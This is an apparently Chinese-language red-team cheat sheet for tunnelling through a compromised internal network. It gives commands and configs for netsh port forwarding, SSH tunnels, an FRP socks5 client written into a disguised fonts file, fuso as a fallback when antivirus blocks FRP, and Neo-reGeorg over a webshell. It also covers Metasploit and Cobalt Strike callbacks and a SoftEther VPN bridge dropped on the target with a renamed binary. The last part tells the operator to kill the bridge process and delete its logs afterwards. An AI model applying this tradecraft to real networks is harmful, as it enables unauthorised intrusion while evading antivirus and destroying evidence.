构建通道漫游内网
网络连通性测试
能出网的做反向代理,不能出网的做正向代理
是否存在Nginx反向代理
找到Nginx目录,查看配置文件
某次实战中发现正反向都代理不出去,查看配置文件发现了nginx反代,直接连接公网IP代理的3389
客户端代理工具
端口转发-高权限无工具
Windows netsh 端口转发(双网卡用)
netsh仅支持TCP协议, 适用于双网卡服务器
连接外网6666端口,就是连接到内网目标上面的3389。
Linux SSH隧道(高权限用)
SSH一般是允许通过防火墙的,而且传输过程是加密的
FRP 反向代理
服务端配置
客户端配置
客户端配置文件
cat > /usr/share/fonts/fonts.ini << EOF
[common]
server_addr = 127.0.0.1
server_port = 60001
token=pwdpwd.886
tls_enable = true
[socks5]
type = tcp
remote_port =2333
plugin = socks5
plugin_user = admin
plugin_passwd = admin123456
use_encryption = true
use_compression = true
EOF
启动客户端
fuso 反向代理
在FRP在Windows上被杀软干掉的时候备用,下载地址:https://github.com/editso/fuso
| Name | ✔(Achieved) / ❌(Unrealized)) |
|---|---|
| 端口转发 | ✔ |
| 传输加密 | ✔ |
| socks5 | ✔ |
| socks5 udp 转发 | ✔ |
| kcp 支持 | ✔ |
| 多映射 | ✔ |
| 级联代理 | ✔ |
| 数据传输压缩 | ✔ |
| websocket | ❌ |
| Rsa加密 | ✔ |
| Aes加密 | ✔ |
Neo-reGeorg 正向代理
下载地址:https://github.com/L-codes/Neo-reGeorg
配合webshell,复用目标的Web服务端口开一个Socks5代理隧道
python3 neoreg.py generate -k password
#生成服务端
python3 neoreg.py -k password -u http://xx/tunnel.php
#在本地建立Socks5代理
毒刺,可直接用于Metasploit、Cobaltstrike上线 GitHub - FunnyWolf/pystinge
天蝎Webshell管理工具自带正向代理
Softether VPN
https://www.softether.org/5-download
在每个站点上,SoftEther VPN可以定义一个虚拟集线器,并使用本地网桥功能在虚拟集线器和物理以太网段之间连接。相当于把多个不同网段的局域网连接到一起。
在公司网络的总部或数据中心,将SoftEther VPN服务器设置为VPN的中央服务器(就是自己的VPS)
安装VPN Server(在自己的VPS上)
使用修改过源码的Docker版安装,这个支持拆分隧道;
也就是连接上VPN后只有你指定的IP段才会走VPN流量,其它时候不影响你正常上网。
docker pull abyssviper/softethervpn
docker run -d --name vpn -p 443:5555 abyssviper/softethervpn
默认监听了4个端口:443,992,1194,5555
HTTPS访问可看到Web管理页面,VPN配置完成后需要禁止访问Web页面
| ./vpnserver stop | #操作前先停止VPN |
| vim vpn_server.config | bool DisableJsonRpcWebApi true |
| ./vpnserver start | #启动VPN服务器 |
设置VPN Server
下载vpn server管理端(Bridge),连接VPN Server默认密码为空,连接后会提示修改。
创建虚拟HUB - 并添加用户(user1/pwd123456)
各个分支网桥级联
在每个分支上,配置 VPN Bridge 以保持与中央 VPN 服务器的级联连接。
创建连接到本地的服务器(密码br123456),端点选择站点到站点。
管理虚拟Hub - 虚拟NAT和虚拟DHCP - 启用secureNAT
等待几分钟,等配置保存......
目标机器反向VPN
#打开C:\Program Files\SoftEther VPN Bridge目录,将以下文件扔到目标机器执行
hamcore.se2、vpn_bridge.config、vpnbridge.exe(可改名)
vbr.exe /usermode
#使用完后kill进程,删除当前目录下的日志文件夹